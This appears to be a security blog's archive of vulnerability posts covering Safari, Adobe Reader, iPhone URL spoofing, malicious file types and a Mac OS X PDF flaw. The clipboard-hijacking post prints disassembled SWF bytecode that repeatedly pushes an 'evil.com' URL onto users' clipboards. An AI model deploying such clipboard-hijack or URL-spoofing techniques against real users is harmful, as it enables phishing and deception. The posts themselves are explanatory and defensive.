Archive

Archive for the ‘Vulnerability’ Category

0day: Apple Safari “parent.close()”

Release Date : 2010-05-07
Criticality level : Highly critical
Impact : Remote code execution
Solution Status : Unpatched

Description:
A vulnerability has been discovered in Apple Safari, which can be exploited by malicious people to compromise a user’s system.

The vulnerability is caused due to an error in the handling of parent windows and can result in a function call using an invalid pointer. This can be exploited to execute arbitrary code when a user e.g. visits a specially crafted web page and closes opened pop-up windows.

The vulnerability is confirmed in Safari version 4.0.5 for Windows. Other versions may also be affected.

Solution:
Do not visit untrusted web sites or follow links from untrusted sources.

PROVIDED AND/OR DISCOVERED BY:
Krystian Kloskowski (h07)

Original Advisory:
http://h07.w.interia.pl/Safari.rar

Advisory Reference:
http://secunia.com/advisories/39670/

PDF Adobe Reader Zero Day

Adobe Reader has two vulnerable JavaScript functions getAnnots() and spell.customDictionaryOpen() that could allow a remote attacker to execute arbitrary code on the system. PoCs were published here.

PSIRT blogged an update saying that this vulnerability is still under investigation and updates will be available by 12th May:

We are in the process of fixing the issue, and expect to make available product updates for the relevant supported Adobe Reader and Acrobat versions and platforms by May 12th, 2009.

Adobe Released Security Bulletin

Release date: May 1, 2009

Vulnerability identifier: APSA09-02

CVE number: CVE-2009-1492, CVE-2009-1493

Platform: All Platforms

Mac users are vulnerable and affected with this vulnerability and as usual it is best recommended that you disable JavaScript if you are using Adobe Reader. Please follow the instruction here.

OS X Vulnerability In 2008

Here’s worth noting information from Secunia.

iphone1

 

osx1

Categories: Vulnerability

iPhone Users Vulnerable to URL Spoofing Attack

As I was reading my RSS feeds, I just noticed that Aviv Raff disclosed two vulnerabilities found in iPhone on Jewish new year (Oct 2). But, to my surprise the phishing vulnerability isn’t new to me, this is bit old, in fact I created a crafted email with spoofed URL on it, as inspired by its original author Juan Pablo Lopez Yacubian.

This topic has been blogged last April 24 – Zero Day Exploit: Safari Address Bar URL Spoofing

Since this vulnerability affects Safari 3.1, obviously iPhone users are affected as well. I just created this email to show that this vulnerability exist.

Notice the URL, you’ll find it creepy ‘coz in Desktop email browser you will usually see the complete URL in the lower right side bar. But in this case, the attacker can simply create a hyperlink to hide it and it’s not that obvious!

Upon clicking it, here’s what you’ll find …

Google in URL bar and Yahoo on the content ? Yes, this is the security flaw found in Safari. This happens when you input a URL containing special characters followed by “@” which indicates the actual hostname. The special characters was crafted long enough to hide the URL of the page.

However,  once you minimize the page, the URL displayed should ring a bell, that this is something fishy!

The lesson here is to be aware and stay safe!

Non-Win32 Malicious Files

There are heaps of Non-Win32 malicious file currently in the wild. These files are crafted to allow attackers to remotely execute arbitrary code.  Although, it exploits known vulnerabilities, but still attackers find it useful as most of us do not bother applying security updates. So, the effect is massive installation of various threats in your computer.

FileType: SWF
Solution: Flash Player Update

FileType: RIFF Windows Animated Cursor
Solution: Microsoft Security Bulletin MS07-017

FileType: PDF
Solution: Adobe Reader and Acrobat Security Update

FileType: RAR
Solution: Update to latest version (version 3.61 and onwards)

Other non-exploited files:

FileType: DOC, Excel, PPT, JPEG, CHM
Behaviour: Drops and Install malicious EXE file

Filetype: ASF (Windows Audio/Video Files)
Behaviour: Connects to remote IP address to download malicious EXE file

For these kind of files, please make sure its coming from trusted source and make sure you have security software with updated signature installed.

Related Post:
Inside Exploited PDF
ASF File Specification & Recent Threats
Malicious CHM

Clipboard Hijacking SWF PoC

Thank God, I’m back …

So, the SWF PoC (proof-of-concept) Clipboard hijacking works in cross-platform (Windows and Mac browser). The sneaky behavior does not exploit any vulnerability instead it uses a legitimate ActionScript as mentioned in my previous post.  Basically, if you refer SWF File Format Specification 9 – SWF 9 introduced ActionScript 3.0 with new DoABC (Do ActionScript Byte Code)  action-definition tags. Like DoAction tags, DoABC defines a series of bytecode to be executed. However, this time DoABC tag run in ActionScript 3.0 virtual machines [For further reading -> VM2 Overview].

From the PoC that was published…

// Defining the symbolclass "test_fla.MainTimeline" into the package
[052]       515 DOABC
class [package]test_fla:MainTimeline extends [package]flash.display:MovieClip, test_fla:MainTimeline, flags=08

{ // test_fla:frame1

constructor ---- [package]test_fla:MainTimeline()
[3 1 10 11 0]
{
getlocal_0
pushscope
getlocal_0
constructsuper 0 params
findpropstrict [package]:addFrameScript
pushbyte 00
getlex [packageinternal]test_fla:frame1
callpropvoid [package]:addFrameScript, 2 params
returnvoid
}
//test_fla:frame1() executes setClip()

method ---- [packageinternal]test_fla:frame1()
[3 1 10 11 0]
{
getlocal_0
pushscope
findpropstrict [package]flash.utils:setInterval
getlex [package]:setClip
pushbyte 01
callpropvoid [package]flash.utils:setInterval, 2 params
returnvoid
}

// setClip() push "http://www.evil.com" users' clipboard
method ---- [package]:setClip()
[2 1 10 11 0]
{
getlocal_0
pushscope
getlex [package]flash.system:System
pushstring "http://www.evil.com"
callpropvoid [package]:setClipboard, 1 params
returnvoid
} }

The interesting part here is not the code, instead the legitimate features and capability that allows it to  cross over boundaries and user systems’ security perimeter making it intrusive, sneaky and potential vector for attackers and malwares.

Should developers must make sure that their processes have their own execution domain?

So, whose fault is this ?

Alert: PDF Vulnerability in Mac OS X

Summary
Mac OS X is “a Unix operating system built from the XNU kernel. Mac OS X provides all the standard Unix capabilities and tools with an additional GUI component”.Remote exploitation of an integer overflow vulnerability in Apple Inc.’s Mac OS X could allow an attacker to execute arbitrary code with the privileges of the currently logged in user.

Vulnerable Systems:
 * Mac OS X version 10.5.2

This vulnerability exists due to the way PDF files containing Type 1 fonts are handled. When processing a font with an overly large length, integer overflow could occur. This issue leads to heap corruption which can allow for arbitrary code execution.

Analysis:
Exploitation of this issue allows an attacker to execute arbitrary code. An attacker could exploit this issue via multiple attack vectors. The most appealing vector for attack is Safari. An attacker could host a malformed PDF file on a website and entice a targeted user to open a URL. Upon opening the URL in Safari the PDF file will be automatically parsed and exploitation will occur. While this is the most appealing attack vector, the file can also be attached to an e-mail. Any application which uses the Apple libraries for file open dialogs will crash upon previewing the malformed PDF document.

Vendor response:
Apple addressed this vulnerability within their Mac OS X 2008-005 security update. More information is available at the following URL:http://support.apple.com/kb/HT2647

Published by SecuriTeam

Stay Safe Online!